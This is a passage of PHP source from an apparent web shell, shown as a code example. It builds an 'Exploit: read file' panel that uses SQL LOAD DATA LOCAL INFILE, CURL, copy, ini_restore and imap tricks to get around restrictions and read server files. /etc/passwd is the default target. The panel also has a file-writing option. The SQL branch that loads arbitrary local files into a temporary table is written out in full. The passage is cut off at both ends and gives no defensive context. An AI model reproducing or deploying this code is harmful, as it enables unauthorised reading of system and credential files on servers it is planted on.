Пример #1
0
                        $select .= "<option value=\"{$key}\" selected>{$value}</option>\n";
                    } else {
                        $select .= "<option value=\"{$key}\">{$value}</option>\n";
                    }
                }
            }
        }
        $select .= "</select>\n";
        return $select;
    }
}
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Exploit: read file [SQL , id , CURL , copy , ini_restore , imap]    & Make file ERORR</b></td></tr></table>', 'center', 'top');
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
$tb->headerform(array('content' => '<FONT COLOR=#9C9C9C>read file :</FONT><br>' . $tb->makeinput('Mohajer22', '/etc/passwd') . $tb->makeinput('', Show, 'Mohajer22', 'submit')));
$tb->headerform(array('content' => '<FONT COLOR=#9C9C9C>read file id:</FONT><br>' . $tb->makeid('plugin', 'cat /etc/passwd') . $tb->makeinput('', Show, 'plugin', 'submit')));
$tb->headerform(array('content' => '<FONT COLOR=#9C9C9C>read file CURL:</FONT><br>' . $tb->makeinput('curl', '/etc/passwd') . $tb->makeinput('', Show, 'curl', 'submit')));
$tb->headerform(array('content' => '<FONT COLOR=#9C9C9C>read file copy:</FONT><br>' . $tb->makeinput('copy', '/etc/passwd') . $tb->makeinput('', Show, 'copy', 'submit')));
$tb->headerform(array('content' => '<FONT COLOR=#9C9C9C>read file ini_restore:</FONT><br>' . $tb->makeinput('M2', '/etc/passwd') . $tb->makeinput('', Show, 'M2', 'submit')));
$tb->headerform(array('content' => '<FONT COLOR=#9C9C9C>read file or dir with imap:</FONT><br>' . $tb->makeimp('switch', '/etc/passwd') . $tb->makeinput('string', '/etc/passwd') . $tb->makeinput('string', 'Show', '', 'submit')));
$tb->headerform(array('content' => '<FONT COLOR=#9C9C9C>Make file ERORR:</FONT><br>' . $tb->makeinput('ER', 'Mohajer22.php') . $tb->makeinput('ER', 'Write', 'ER', 'submit')));
// read file SQL ( ) //
if (empty($_POST['Mohajer22'])) {
} else {
    echo "read file SQL", "<br>";
    echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
    $file = $_POST['Mohajer22'];
    $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
    $mysql_files = explode(':', $mysql_files_str);
    $sql = array("USE {$mdb}", 'CREATE TEMPORARY TABLE ' . ($tbl = 'A' . time()) . ' (a LONGBLOB)', "LOAD DATA LOCAL INFILE '{$file}' INTO TABLE {$tbl} FIELDS " . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' " . "ESCAPED BY          '' " . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'", "SELECT a FROM {$tbl} LIMIT 1");
    mysql_connect($mhost, $muser, $mpass);